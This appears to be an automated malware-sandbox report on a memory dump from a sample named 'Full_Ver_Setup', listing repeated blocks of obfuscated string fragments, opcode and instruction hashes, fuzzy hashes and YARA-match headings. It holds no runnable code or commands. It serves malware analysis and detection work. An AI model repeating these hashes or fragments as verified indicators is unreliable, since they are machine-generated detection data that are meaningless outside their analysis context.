                                                                                                                                                                  • String ID: $Q=S$&U7W$)I&K$+E%G$,-$<WXY$?Y?[$lm
                                                                                                                                                                  • API String ID: 0-416916382
                                                                                                                                                                  • Opcode ID: 71f777ab08718cc498c3463f062f94b073fc073a62192b10163cc124484dc2e3
                                                                                                                                                                  • Instruction ID: 11148f2734250eda86d57beccb9ba0886b16e94c9ce4a5d8969503afd6bdaa75
                                                                                                                                                                  • Opcode Fuzzy Hash: 71f777ab08718cc498c3463f062f94b073fc073a62192b10163cc124484dc2e3
                                                                                                                                                                  • Instruction Fuzzy Hash: CB71E1B66183129BC718CF64C8A276BBBE2EFC1310F08896CE4C29B791E778C545C746
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: !A,C$%E4G$&ce$1IJK$G5U7$W9H;$X=}?
                                                                                                                                                                  • API String ID: 0-2370037849
                                                                                                                                                                  • Opcode ID: babfc03b202223b2ea815d06e5f4aa5c97e7c1b5a12a6cd8f0b2fcef14130166
                                                                                                                                                                  • Instruction ID: 88783834593ac018b2712e5f0e260b2df0329b4508e881d7807cac2dcc398e9d
                                                                                                                                                                  • Opcode Fuzzy Hash: babfc03b202223b2ea815d06e5f4aa5c97e7c1b5a12a6cd8f0b2fcef14130166
                                                                                                                                                                  • Instruction Fuzzy Hash: 5551E43260C3558FD719CF24C41139FB7E2EBC5304F45892DE4D9AB281CB74864ACB86
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: /37)$:;$;$M$\e_f$lY`U
                                                                                                                                                                  • API String ID: 0-1962709878
                                                                                                                                                                  • Opcode ID: c54df3b8a70d20b4a6287c8b41472ad5cafa198615049607ff3a54dfebdbe25a
                                                                                                                                                                  • Instruction ID: eae9b53af7bfc0eb204916b4f737c2fb348c35d6a3d82f093640fc762cd7833e
                                                                                                                                                                  • Opcode Fuzzy Hash: c54df3b8a70d20b4a6287c8b41472ad5cafa198615049607ff3a54dfebdbe25a
                                                                                                                                                                  • Instruction Fuzzy Hash: 7CB104B261C3408BD714DF25C89166FBBF6EBD2314F18896DE4D18B382EA79C509CB16
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: z$XY$t$IK$M.O
                                                                                                                                                                  • API String ID: 0-876838883
                                                                                                                                                                  • Opcode ID: b11dce8750e3efddf7c17940ad26bcd87201fb4a715c2bfe0c4fdb4d15cc2b8a
                                                                                                                                                                  • Instruction ID: 1f3a923266a95059f86cafd9ab729bab5936ef986c1fccd53ded3f5754fd7060
                                                                                                                                                                  • Opcode Fuzzy Hash: b11dce8750e3efddf7c17940ad26bcd87201fb4a715c2bfe0c4fdb4d15cc2b8a
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F71EFB694C3509FD304DFA8C84155FFBE2EBD2300F48985CE4D89B216D6798A0ACB97
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 9674$KFMB$^^G@$s
                                                                                                                                                                  • API String ID: 0-3660127563
                                                                                                                                                                  • Opcode ID: 8fe5658e873cac04ccd2200344aeff8df1350dc49faccf0b20842f70310aafe5
                                                                                                                                                                  • Instruction ID: 831427f401c697bb40a268ec180a01e0a453565b5d32ea962efe82c013573bf3
                                                                                                                                                                  • Opcode Fuzzy Hash: 8fe5658e873cac04ccd2200344aeff8df1350dc49faccf0b20842f70310aafe5
                                                                                                                                                                  • Instruction Fuzzy Hash: C372477151C3928FC725CF28CD8066EBBE2BF95310F098A6CE8E58B391D7359946CB52
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 9<zy$[\$lQ$p
                                                                                                                                                                  • API String ID: 0-3285090289
                                                                                                                                                                  • Opcode ID: 10f7d6a2392ebe3ef69dab8479d8c17d11c1f4e0cc9abf30dc03e3ac996ebd17
                                                                                                                                                                  • Instruction ID: 01e15f2d70d089fab6d6809dfc93b5137c55ffe7b9214dd35138f35fb689f4cb
                                                                                                                                                                  • Opcode Fuzzy Hash: 10f7d6a2392ebe3ef69dab8479d8c17d11c1f4e0cc9abf30dc03e3ac996ebd17
                                                                                                                                                                  • Instruction Fuzzy Hash: B4B127B166C3918BD314CF68849127FFBE1AFC2204F5C8A6CE4D68F382D675854E874A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: FFs$FFs$s$~
                                                                                                                                                                  • API String ID: 0-232187595
                                                                                                                                                                  • Opcode ID: 2e165b7a8921dddc67efbf189045181e432e957a1142ab315d9c5da84628a7ac
                                                                                                                                                                  • Instruction ID: a4bdf7368d37b66ef665cf6a5575e22790ab36184de70df9a911b5611d29b804
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e165b7a8921dddc67efbf189045181e432e957a1142ab315d9c5da84628a7ac
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F81297121C3868FDB15CF29849036AFBE19F92204F1C85AEE4D597382E779C54E8726
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: w$x$y$~
                                                                                                                                                                  • API String ID: 0-3541634014
                                                                                                                                                                  • Opcode ID: a2ecdad8e65f4f7276df8094a75c61d16874cff1733835a2dcc9a22b87c1c02b
                                                                                                                                                                  • Instruction ID: 62d6697d6be97884ef8988515e5757b90ac2c821153d13c373acbedebc871532
                                                                                                                                                                  • Opcode Fuzzy Hash: a2ecdad8e65f4f7276df8094a75c61d16874cff1733835a2dcc9a22b87c1c02b
                                                                                                                                                                  • Instruction Fuzzy Hash: BFB148F262C7958BC718CA3C885432FFBD29BC6224F1D8A6DD4E6473D2D2B589818742
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: UXT.$gx$yYSW
                                                                                                                                                                  • API String ID: 0-375554135
                                                                                                                                                                  • Opcode ID: e56b483dad12eec71d775553c6994133b3fa7e18d06b5b41b3695d3e3d94801f
                                                                                                                                                                  • Instruction ID: 887784159e37d6371a1cdbac5a4a1a1cf88d3bbd1cb2cba8f8b147db8a8e9619
                                                                                                                                                                  • Opcode Fuzzy Hash: e56b483dad12eec71d775553c6994133b3fa7e18d06b5b41b3695d3e3d94801f
                                                                                                                                                                  • Instruction Fuzzy Hash: 55D1F06051C3E29ED735CB3588507AFBFE1AF93240F18899DD1CDAB282D779444ACB26
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: UXT.$gx$yYSW
                                                                                                                                                                  • API String ID: 0-375554135
                                                                                                                                                                  • Opcode ID: 2bbd8e9ec77b3a217491e8c351d0e7a4a25cd3542d6d443774b88abfac213130
                                                                                                                                                                  • Instruction ID: edbf7bac7454e07d0ebbe2cdbf5c59f98f19cca0fd3b7946e92a15543c2c1d94
                                                                                                                                                                  • Opcode Fuzzy Hash: 2bbd8e9ec77b3a217491e8c351d0e7a4a25cd3542d6d443774b88abfac213130
                                                                                                                                                                  • Instruction Fuzzy Hash: 4AB1E06051C3E29ED725CB3588507AFBFE1AF93240F18889DD0CDAB283D779854ACB16
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Bu$C`${H
                                                                                                                                                                  • API String ID: 0-3314533072
                                                                                                                                                                  • Opcode ID: a182e69332825a3e4eea6f41208f8f6e83a12f24b741bbd07f32295aa3dc9455
                                                                                                                                                                  • Instruction ID: a414fa22c3ec85c3286ab49ac4130187ee21096cb0b6f83a4ed2ed38c072d21b
                                                                                                                                                                  • Opcode Fuzzy Hash: a182e69332825a3e4eea6f41208f8f6e83a12f24b741bbd07f32295aa3dc9455
                                                                                                                                                                  • Instruction Fuzzy Hash: 69912FB4604B828FD725CF29C680662BBA2FF86300718859CC4919FB56D739F496CB91
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: "9$kL$OU
                                                                                                                                                                  • API String ID: 0-711883280
                                                                                                                                                                  • Opcode ID: 152ef1fb7de82e70364a09166566de1206cf56b509eac23a16b295d0b5438f61
                                                                                                                                                                  • Instruction ID: 0df220bc8eba70e99bd40f730ef11b2267073f0bfc59a0123022d3ecb6ccff82
                                                                                                                                                                  • Opcode Fuzzy Hash: 152ef1fb7de82e70364a09166566de1206cf56b509eac23a16b295d0b5438f61
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C71A9B451C3E18BE330CF25899179BBFE1ABD6310F1889ACC5C92B242D7754446CBA7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: GW$[T$^P
                                                                                                                                                                  • API String ID: 0-3161713602
                                                                                                                                                                  • Opcode ID: a6ac44591574d7b59a3820fa5474f958a6c5e0b4fb49b78866cb0690ab328ca4
                                                                                                                                                                  • Instruction ID: 726263c10f4d62c3a4001a0991b537b62ddca5126ae753cb846f1576114eb6d4
                                                                                                                                                                  • Opcode Fuzzy Hash: a6ac44591574d7b59a3820fa5474f958a6c5e0b4fb49b78866cb0690ab328ca4
                                                                                                                                                                  • Instruction Fuzzy Hash: D531DCB454D384CAE7309F95858179BBAA0FB92740F649A1CE2E81B2A1D7B89441CF47
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ]Ey"$fb8o
                                                                                                                                                                  • API String ID: 0-2620436900
                                                                                                                                                                  • Opcode ID: bd99cc0b6d70517e7ea92cef7eb6512f8d4f03cf969290823e822d753a5a6779
                                                                                                                                                                  • Instruction ID: 73e7f546b389462ee8dc0b1192ff048644fcf4f1e15a9481b301cacd24e8113a
                                                                                                                                                                  • Opcode Fuzzy Hash: bd99cc0b6d70517e7ea92cef7eb6512f8d4f03cf969290823e822d753a5a6779
                                                                                                                                                                  • Instruction Fuzzy Hash: 5702137051C3E28FD729CF2984607AEBFE1AFD7200F1849ADE4D98B382D6758546CB52
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: "$.
                                                                                                                                                                  • API String ID: 0-3921061877
                                                                                                                                                                  • Opcode ID: 03d35ba0e77ee4950f7ec58b6576ec4df668ed6d0af96a5fb4fa8c8b71222e24
                                                                                                                                                                  • Instruction ID: 6dc2079499e777654cb5e09c693bb6a78cc8af54102daec12174225ffae14a55
                                                                                                                                                                  • Opcode Fuzzy Hash: 03d35ba0e77ee4950f7ec58b6576ec4df668ed6d0af96a5fb4fa8c8b71222e24
                                                                                                                                                                  • Instruction Fuzzy Hash: 4412937552C791CBD334DF38C5943AEBBE1ABD9210F098E6DE4DA873C1D6B488858B42
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: "(#$s+1#
                                                                                                                                                                  • API String ID: 0-3207113266
                                                                                                                                                                  • Opcode ID: 4098d73e6b9223aba24d42648210bdf96b18409e93c0a1e08b2d3730f92e7b16
                                                                                                                                                                  • Instruction ID: 3cfe41876cfd5726aa0180701ed220e25f6195c7449e17aebe75b943d7289d4d
                                                                                                                                                                  • Opcode Fuzzy Hash: 4098d73e6b9223aba24d42648210bdf96b18409e93c0a1e08b2d3730f92e7b16
                                                                                                                                                                  • Instruction Fuzzy Hash: E9D159B29183519FD714CF28C89176FBBE2EB85304F088A6CD5D58B282D375DA95CB82
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: )$IEND
                                                                                                                                                                  • API String ID: 0-707183367
                                                                                                                                                                  • Opcode ID: e7a20d70489983360a1602c3c0b8975dde3bda3777f33b15bf39fa9d26b694ed
                                                                                                                                                                  • Instruction ID: ce34c01ff4ac966aefe5a5a32911209cdb83df2f8983ae12434f1456b71814a6
                                                                                                                                                                  • Opcode Fuzzy Hash: e7a20d70489983360a1602c3c0b8975dde3bda3777f33b15bf39fa9d26b694ed
                                                                                                                                                                  • Instruction Fuzzy Hash: 4DD1C0B19183449FD720CF14CC8475ABBE4AB85304F14852DF9999B3C2E3B5E988CF92
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: pr$|~
                                                                                                                                                                  • API String ID: 0-4145297803
                                                                                                                                                                  • Opcode ID: 7ea9f7188e2026142c9eb2a46f288ee03f89a80c2208201c25e96547854dc01d
                                                                                                                                                                  • Instruction ID: da96dfd436a64121dc6732b69d0fe42ba11df0ecdc8390bfda6df23be2fd347e
                                                                                                                                                                  • Opcode Fuzzy Hash: 7ea9f7188e2026142c9eb2a46f288ee03f89a80c2208201c25e96547854dc01d
                                                                                                                                                                  • Instruction Fuzzy Hash: F4915172A183138BC314CF29C8906ABB7E2FFD4350F1D892DE8C95B255E7348995CB82
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: _$c=N?
                                                                                                                                                                  • API String ID: 0-2783441885
                                                                                                                                                                  • Opcode ID: 255034e33a42865a140b4290a9fbaa12fe21ee4d9fdb1158cd5f42e66ff15c97
                                                                                                                                                                  • Instruction ID: 0f6f0ea6dedc05a3d19cb05846b8ef221c0a001c6f2320d0762d4928c402f599
                                                                                                                                                                  • Opcode Fuzzy Hash: 255034e33a42865a140b4290a9fbaa12fe21ee4d9fdb1158cd5f42e66ff15c97
                                                                                                                                                                  • Instruction Fuzzy Hash: B5714D0621569106DB3CDF748996337BEE69F84208F2881FECA55CFA97F638C6138749
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: IJ$a<c>
                                                                                                                                                                  • API String ID: 0-4146587207
                                                                                                                                                                  • Opcode ID: e7b981a9a2a540911738e71be6f63f7f1ba0006a22294748d05a71be9439a954
                                                                                                                                                                  • Instruction ID: 454645af405b0e84e6b92e4283d021b5c508125c7e99f1d7ddd22fc6be921d54
                                                                                                                                                                  • Opcode Fuzzy Hash: e7b981a9a2a540911738e71be6f63f7f1ba0006a22294748d05a71be9439a954
                                                                                                                                                                  • Instruction Fuzzy Hash: F53101B6A0C3609FC304CF65888165FFBE2ABD1300F65892CE590AB314E770C9458B9B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: YimW$mUhS
                                                                                                                                                                  • API String ID: 0-3297437401
                                                                                                                                                                  • Opcode ID: 3941f9436abb481825e4200e98b8df14b51c818e0652eac62c111426c5074ac9
                                                                                                                                                                  • Instruction ID: 31bcfdd4328ef2370846c109176dfc13358c23f2e9e45cf5d3d97c31061c45e6
                                                                                                                                                                  • Opcode Fuzzy Hash: 3941f9436abb481825e4200e98b8df14b51c818e0652eac62c111426c5074ac9
                                                                                                                                                                  • Instruction Fuzzy Hash: 0821033005D3B18FC310CB3A45944AAFFE39ECA445F5D46AED0E887341D632C68A8B46
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: l
                                                                                                                                                                  • API String ID: 0-2517025534
                                                                                                                                                                  • Opcode ID: 73ca605ee526c4708dcfac964786c81b148b502e88ea8a6f4581c9c9c036ece6
                                                                                                                                                                  • Instruction ID: a39de066ae6a2c8714353a6544452ef9b6aec78292bcc3888b5e0b49c6bea347
                                                                                                                                                                  • Opcode Fuzzy Hash: 73ca605ee526c4708dcfac964786c81b148b502e88ea8a6f4581c9c9c036ece6
                                                                                                                                                                  • Instruction Fuzzy Hash: 3282497562A3419BE724CB64CD80B2FB7E6EBE1300F18C97CE4859B291D3759C91CB52
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: f
                                                                                                                                                                  • API String ID: 0-1993550816
                                                                                                                                                                  • Opcode ID: 04c70b06f736a240faf6fcbdf6c7168dcd1c9529b0ceb4b1e7a49d6fc92d99ba
                                                                                                                                                                  • Instruction ID: aee53adb842452cb2a7cd19e701c08a0da15f2dd263a3a0282e67b55d21b7fea
                                                                                                                                                                  • Opcode Fuzzy Hash: 04c70b06f736a240faf6fcbdf6c7168dcd1c9529b0ceb4b1e7a49d6fc92d99ba
                                                                                                                                                                  • Instruction Fuzzy Hash: 0622EFB161C3418BD714CF28C890A2BFBE5EBCA714F188A2CE59697391D771D8858B82
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Z^\$
                                                                                                                                                                  • API String ID: 0-3386623465
                                                                                                                                                                  • Opcode ID: a01fd8f87f26d3d816f1489fecb99da8441a4692f313b6bc4dccc3dd5f847be8
                                                                                                                                                                  • Instruction ID: 4b15bd3cadb93edac7e8a5cb3f9b380218ea4267fbb0ae10b1af32bf28f9c664
                                                                                                                                                                  • Opcode Fuzzy Hash: a01fd8f87f26d3d816f1489fecb99da8441a4692f313b6bc4dccc3dd5f847be8
                                                                                                                                                                  • Instruction Fuzzy Hash: D402E0B4118B829FD326CF39C590622BFA1BF57210719868CC4D64FB92D376A84BCF95
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: rqrs
                                                                                                                                                                  • API String ID: 0-1631882910
                                                                                                                                                                  • Opcode ID: 7cd6609dd8005dbfe61f37b8ddcc083cae962b8296412280bd0794df498b261d
                                                                                                                                                                  • Instruction ID: a20e88c39a6f777a1fa647872b4067639c84cbd1622e4f32c9cab8b9add43d1a
                                                                                                                                                                  • Opcode Fuzzy Hash: 7cd6609dd8005dbfe61f37b8ddcc083cae962b8296412280bd0794df498b261d
                                                                                                                                                                  • Instruction Fuzzy Hash: 3BA155B1A1C301ABD718CE28E99157BBBE2EBD6710F1D852CE9C687394D634DC46C782
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 0-3019521637
                                                                                                                                                                  • Opcode ID: d23536b7a6bcf028e7916a67eef07a97f4248be6ff59e47b11594359b8598ad6
                                                                                                                                                                  • Instruction ID: ec6ca9f4ed3798e674b3f07acb5f851d7c807fe0dc0437de7a29f039de99b881
                                                                                                                                                                  • Opcode Fuzzy Hash: d23536b7a6bcf028e7916a67eef07a97f4248be6ff59e47b11594359b8598ad6
                                                                                                                                                                  • Instruction Fuzzy Hash: 52A12775A18311ABC725CF28D98052BF7E1FF8A710F49852CEAD657361D731AC80CB91
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: #
                                                                                                                                                                  • API String ID: 0-1443896768
                                                                                                                                                                  • Opcode ID: 5da2c702fa9d399ca20ae182e24b227c97f20bec088f345eb5c990a3586aed60
                                                                                                                                                                  • Instruction ID: d0c4fd6fb32e8195ed3ad47f5963fc3dd331b26753994b2111679792d32bf889
                                                                                                                                                                  • Opcode Fuzzy Hash: 5da2c702fa9d399ca20ae182e24b227c97f20bec088f345eb5c990a3586aed60
                                                                                                                                                                  • Instruction Fuzzy Hash: 927122725243058BC724DF28CD92667B3E1EFD2324F29459DE8828B391F778D958C7A2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
